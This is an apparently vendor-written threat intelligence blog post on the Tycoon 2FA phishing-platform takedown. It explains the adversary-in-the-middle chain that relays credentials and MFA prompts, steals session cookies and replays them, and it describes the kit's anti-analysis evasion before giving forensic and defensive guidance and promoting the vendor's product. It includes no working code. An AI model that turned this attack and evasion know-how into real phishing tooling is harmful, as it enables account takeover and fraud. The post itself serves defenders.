Europol, TycoonMFA and a quiet month for phishing attacks

On March 4, 2026, a coordinated coalition led by Microsoft and Europol seized 330 domains forming the backbone of Tycoon 2FA - the phishing-as-a-service (PhaaS) platform responsible for an estimated 62% of all MFA-bypass phishing attempts blocked by Microsoft systems at its peak. Law enforcement agencies in Latvia, Lithuania, Portugal, Poland, Spain, and the United Kingdom executed simultaneous infrastructure seizures, while a U.S. District Court order from the Southern District of New York authorized Microsoft to take control of the platform's control panels and fraudulent login pages.

The operation represents the most significant disruption of adversary-in-the-middle (AitM) phishing infrastructure to date. For DFIR practitioners and security operations teams, this is a watershed moment — but not a conclusion. The underlying technique that powered Tycoon 2FA remains very much alive across a growing ecosystem of competing toolkits, and the operational playbook for investigating AitM-driven compromises has never been more critical.

This post examines what Tycoon 2FA was, how it worked at a technical level, what the takedown changes (and what it doesn't), and what DFIR teams should be doing right now to prepare for what comes next.

Tycoon 2FA: Anatomy of an AitM Phishing Platform

Tycoon 2FA emerged in August 2023 and quickly established itself as the dominant player in the PhaaS market. By early 2025, it accounted for roughly 76% of all detected AitM phishing incidents. The platform was subscription-based - sold through Telegram and Signal channels for as little as $120 for ten days of access, or $350 per month for a full web-based administration panel. That price point is significant: it placed sophisticated MFA-bypass capabilities within reach of threat actors who lacked the technical skill to build or operate such infrastructure independently.

The platform's primary developer has been identified as Saad Fridi, operating under the monikers "SaaadFridi" and "Mr_Xaad," reportedly based in Pakistan. TrendAI's intelligence collection efforts, running from late 2024 through November 2025, were instrumental in establishing this attribution. Legal action has been taken against Fridi and efforts to identify Tycoon 2FA affiliates remain ongoing.

At scale, the numbers are staggering. Europol confirmed the platform generated tens of millions of phishing emails per month, facilitated unauthorized access to nearly 100,000 organizations globally - including schools, hospitals, and public institutions (many of which used Strand to respond to the attacks) and is linked to approximately 96,000 distinct phishing victims since 2023, including over 55,000 Microsoft customers. Healthcare and education were disproportionately targeted.

How Tycoon 2FA Bypassed MFA: The Technical Chain

The core innovation of Tycoon 2FA — shared with all AitM phishing platforms — is that it does not attempt to crack, brute-force, or guess the second authentication factor. It relays it. The platform operated as a transparent reverse proxy positioned between the victim and the legitimate identity provider (primarily Microsoft 365 and Google Workspace). The attack chain proceeds as follows:

Step 1: Initial lure delivery. Victims receive phishing emails containing attachments or malicious links - commonly .svg, .pdf, .html, .docxfiles, or Sharepoint links from other "legitimate" but previously compromised organisations. Calendar and to-do list files also became increasingly popular during the end of 2025.

Step 2: Credential relay. The phishing page renders a pixel-perfect replica of the legitimate login interface. When the victim enters their username and password, Tycoon immediately forwards these credentials to the real identity provider in real time. From the victim's perspective, the experience is indistinguishable from a normal login.

Step 3: MFA relay. The legitimate service responds with a standard MFA challenge - a push notification, SMS code, authenticator app prompt, or number-matching dialog. Tycoon proxies this challenge back to the victim's browser. The victim completes the MFA step, believing they are authenticating normally. The MFA prompt arrives through normal, legitimate channels such as Microsoft authenticator.

Step 4: Session cookie capture. Upon successful authentication, the identity provider issues a session cookie (e.g., FedAuth, .AspNetCore.Session) to the reverse proxy. Tycoon captures this cookie before forwarding the victim to a benign-looking landing page. The victim is now logged in normally. The attacker now holds a fully authenticated session token. Strand's tests also observed that pre-existing authentication sessions (e.g., where users were already authenticated to M365 online) could be captured without interaction - the simple act of visiting the malicious domain was sufficient to enable compromise.

Step 5: Session replay and persistence. The attacker replays the stolen session cookie from their own infrastructure, inheriting the victim's authenticated session without needing to re-enter credentials or satisfy any further MFA prompts. Critically, this access persists even if the victim subsequently changes their password - unless active sessions and tokens are explicitly revoked.

This is the fundamental point that DFIR teams must internalize: MFA was never designed to defend against session hijacking. Tycoon 2FA does not defeat MFA. It renders it irrelevant by operating at a layer above the authentication ceremony itself.

Infrastructure and Evasion

Tycoon 2FA's infrastructure was built on Node.js and PHP with Nginx or custom reverse proxies intercepting all HTTP/S traffic, including POST requests containing credentials and MFA responses. The platform's operational security was considerable:

• Rapid domain rotation. Infrastructure shifted from static, high-entropy domains to short-lived FQDNs (often active for only 24–72 hours) spread across diverse TLDs, primarily hosted behind Cloudflare.

• Anti-analysis measures. Phishing pages deployed heavily obfuscated and randomized JavaScript and HTML. The kit performed environment detection to identify automation tools, headless browsers, and interception proxies like Burp Suite. It blocked developer tools, keyboard shortcuts, and right-click context menus. Debugger timing detection identified active DevTools sessions.

• Dynamic code generation. Nonfunctional dead code was injected to defeat signature-based detection and consistent fingerprinting attempts.

• Operator telemetry. The administrative panel tracked valid and invalid sign-in attempts, MFA usage, and session cookie capture, with victim data organized by targeted service, browser, geolocation, and authentication status. Captured credentials and cookies could be downloaded directly or forwarded to Telegram in near-real time.

Geographic analysis of attacker replay activity - filtering out residential proxy and VPN infrastructure - showed login activity concentrated primarily in Nigeria (211 observed logins) and South Africa (62), with smaller volumes from the United States, Canada, Saudi Arabia, and Kenya.

What This Means for DFIR Teams

The takedown of Tycoon 2FA's infrastructure is operationally significant, but it does not eliminate the threat class. DFIR teams responding to business email compromise (BEC), account takeover, and identity-based intrusions should treat this moment as an inflection point for revisiting detection, investigation, and remediation workflows.

With that said, Strand observed a lull in the volume of phishing compromises (especially against non-US entities) in February 2026.

Immediate Forensic Priorities

For organizations that may have been compromised through Tycoon 2FA prior to the takedown, the investigation scope extends well beyond credential reset:

Session token audit and revocation. Identifying and revoking all active sessions for potentially compromised accounts is the single most critical remediation step. Password resets alone are insufficient — stolen session cookies remain valid until explicitly revoked or expired. Azure AD (Entra ID) sign-in logs and Google Workspace audit logs should be examined for anomalous session creation patterns, particularly sessions originating from geographic locations inconsistent with the user's normal activity.

BEC follow-on activity. Tycoon 2FA was one of the most popular kits for facilitating BEC attacks. After gaining access, operators frequently used compromised mailboxes to launch invoice fraud, payroll redirection, and internal phishing campaigns through criminal-controlled "mule" accounts. Investigators should examine sent items, mail rules (especially auto-forwarding and auto-delete rules), and OAuth app registrations for indicators of persistence.

Browser forensic artifacts. Threat actors are getting better at covering their tracks and hard-deleting initial phishing emails. Endpoint-level investigation is often required to identify the root cause of attacks, with relevant artifacts including Chrome cookie databases (AppData\Local\Google\Chrome\User Data\Default\Cookies), session files (Current Session, Last Session), and history databases. Firefox equivalents reside in AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite. These artifacts can help establish timeline context around when a user visited a phishing page and whether a session token was issued.

Cloud audit trail analysis. Entra ID sign-in logs, Conditional Access evaluation results, and token issuance events should be correlated against known Tycoon 2FA infrastructure indicators. Look for sign-in events where the authenticating IP differs from the subsequent session IP - a strong indicator of session cookie replay.

Mimecast events should also be considered, as discussed in our recent threat intelligence advisory: https://www.strandintelligence.com/blog/threat-actors-using-mimecast-to-evade-m365-forensics

Detection Engineering Considerations

The AitM attack pattern creates characteristic forensic signals that detection teams can operationalize:

• TLS fingerprint anomalies. Because AitM reverse proxies use TLS implementations native to their programming language (typically Go or Node.js), the TLS fingerprint presented to the identity provider differs from legitimate browser fingerprints. JA3/JA3S fingerprinting at the identity provider level can surface these discrepancies.

• Newly registered domain correlation. The vast majority of AitM phishing infrastructure operates on recently registered domains with short-lived certificates. DNS telemetry enriched with domain age data is a high-value detection signal.

• Geographic session anomalies. Attackers must approximate the victim's location when replaying session cookies to avoid triggering risk-based authentication challenges. Detecting sessions that originate from residential proxy infrastructure or show subtle geographic inconsistencies (same city, different ASN) warrants investigation.

• Conditional Access Policy gaps. Organizations that have not implemented token binding/token protection (https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-token-protection), continuous access evaluation (CAE), or device compliance requirements in their Conditional Access policies are disproportionately exposed to session replay attacks.

The Broader AitM Ecosystem: Tycoon Is Not Alone

The technique that made Tycoon 2FA effective is not proprietary. It is a well-documented attack pattern implemented across a growing family of PhaaS toolkits. The takedown of Tycoon 2FA's infrastructure will likely accelerate migration to competing platforms.

Evilginx

Evilginx is the open-source ancestor of the modern AitM phishing ecosystem. Originally released in 2017 as a modified Nginx configuration, it was later rewritten in Go with its own HTTP and DNS server implementation. Evilginx introduced the concept of "phishlets" — modular, service-specific proxy configurations that can be authored for any target (Microsoft, Okta, LinkedIn, Google, and essentially any web application with cookie-based authentication).

While marketed as a penetration testing and red team tool, Evilginx's open-source availability means it is freely adopted by threat actors. It has been observed in campaigns attributed to the Star Blizzard APT group (linked to Russia's FSB) and in a significant 2025 campaign targeting 18 U.S. universities. Its modular architecture, support for custom evasion mechanisms, and active development community make it a persistent and evolving threat.

EvilProxy

Active since mid-2022 and sold through the Exploit and XSS cybercrime forums as well as Telegram, EvilProxy maintains approximately 280 active servers on average. Its appeal lies in its low barrier to entry — operators require minimal technical expertise to target Microsoft 365, Google, and other cloud platforms. EvilProxy accounted for roughly 8% of detected AitM phishing incidents in early 2025.

Mamba 2FA

Discovered in May 2024, Mamba 2FA emerged as a significant threat particularly targeting Microsoft 365 environments. Barracuda analysts detected a surge in Mamba 2FA activity in late 2025, accounting for close to 10 million attacks. Its pricing model mirrors the broader PhaaS market: basic services start around $120, with advanced features at approximately $250 per month.

The Next Wave

The PhaaS market is experiencing rapid innovation. Newer entrants observed in late 2025 and early 2026 include Sneaky 2FA (which uses browser-in-the-browser fake login windows and validates stolen credentials through legitimate Microsoft APIs), Whisper 2FA (a lightweight kit using AJAX-based exfiltration instead of traditional reverse proxies), and GhostFrame (first observed in September 2025, prioritizing code obfuscation and URL concealment). Barracuda's threat analysts recorded a doubling in the number of PhaaS kits in active use during 2025.

The takedown of the market leader will not shrink this ecosystem. It will redistribute it.

What Happens Next

Short-Term: Infrastructure Reconstitution

History suggests Tycoon 2FA's operators will attempt to rebuild. Johannes Ullrich, dean of research at the SANS Institute, noted that access brokers like Tycoon 2FA are typically less sensitive to domain takedowns than malware operators - they will need time to rebuild domain infrastructure, but the core platform codebase likely survives. The 57.6% reduction in phishing volume observed between November 2025 and January 2026 (coinciding with early-phase infrastructure seizures) demonstrates the operational impact, but it is almost certainly temporary.

The identification of the alleged primary developer creates legal and operational pressure, but the affiliate model means the operational knowledge is distributed. Affiliates who relied on Tycoon 2FA's infrastructure are already migrating — or building their own.

Medium-Term: Ecosystem Fragmentation

The PhaaS market will likely fragment further. Smaller, more operationally secure platforms may emerge, learning from the infrastructure patterns that enabled the Tycoon 2FA takedown. Expect to see increased use of bulletproof hosting, decentralized infrastructure models, and more aggressive domain rotation cycles.

Long-Term: The Authentication Problem Persists

The fundamental vulnerability that AitM phishing exploits - cookie-based session authentication following a one-time MFA ceremony - remains structurally present in the vast majority of enterprise identity architectures. Until phishing-resistant authentication methods and token protection achieve broad adoption, the attack surface persists regardless of which specific toolkit occupies market share.

Defensive Recommendations

For DFIR teams and security operations leadership, the Tycoon 2FA takedown should catalyze action across several fronts:

Deploy phishing-resistant MFA. FIDO2 security keys and passkeys use asymmetric public-key cryptography bound to specific domains. A FIDO2 authenticator will not respond to an authentication request that does not originate from the legitimate domain - making AitM proxying technically ineffective. This is the single highest-impact control against the entire AitM phishing class.

Implement token binding and Continuous Access Evaluation. Token binding locks session tokens to specific TLS connections, rendering stolen cookies useless on attacker infrastructure. CAE enables real-time session revocation when risk signals change (IP shift, device compliance loss, impossible travel).

Shorten session lifetimes. Reducing the validity window of session cookies limits the attacker's operational window after a successful capture. Balance usability against risk based on resource sensitivity.

Harden Conditional Access policies. Require device compliance, enforce named location restrictions, and implement sign-in risk policies that challenge or block authentication from anomalous contexts.

Invest in DNS-layer detection. Filtering newly registered domains, monitoring for domain lookalikes, and enriching DNS telemetry with registration age data provides early-warning capability against AitM infrastructure before phishing emails reach inboxes.

Operationalize AitM-specific detection rules. Build detection logic around TLS fingerprint anomalies, geographic session inconsistencies, residential proxy indicators, and OAuth app registration patterns that characterize post-compromise AitM activity.

Conduct AitM adversary simulations. Red team exercises using tools like Evilginx in controlled environments provide direct insight into organizational exposure and validate detection coverage against real AitM attack chains.

Invest in automated investigation and response capability. Phishing-as-a-service is not going away - the Tycoon 2FA takedown will displace threat actors briefly, not eliminate them, and the next generation of AitM kits is already emerging. When a compromise does occur, the critical question shifts from prevention to speed: how quickly can your team establish root cause, map the blast radius, and determine exactly what data was accessed or exfiltrated? Manual investigation workflows cannot keep pace with the volume and velocity of AitM-driven intrusions at scale. Strand Intelligence provides AI-powered digital forensics and incident response that automates the investigative heavy lifting - from initial triage through root cause analysis and data impact assessment - so your team can move from detection to definitive answers in hours, not weeks. Learn more at strandintelligence.com.

Conclusion

The Tycoon 2FA takedown is a significant operational achievement - the result of sustained intelligence collection, cross-border law enforcement coordination, and public-private collaboration at a scale rarely seen in cybercrime disruption. The coalition's success in attributing the platform's developer, seizing its infrastructure, and achieving a measurable reduction in phishing volume demonstrates that even well-resourced PhaaS operations are not beyond reach.

But for DFIR teams, the work is just beginning. The threat actor ecosystem will adapt. The underlying attack technique is durable, well-understood, and implemented across a growing number of competing platforms. Organizations that treated MFA as the end state of their authentication security posture now face a clear and urgent requirement to evolve.

The question is no longer whether AitM phishing can bypass your MFA. It can. The question is whether your detection, investigation, and remediation capabilities are built for that reality, and where the threat actors will migrate to next (which won't take them long).

Strand Intelligence provides AI-powered digital forensics and incident response, delivering automated investigation capabilities for ransomware, BEC, and identity-based intrusions. For more on how Strand can help your team respond to AitM-driven compromises, visit strandintelligence.com.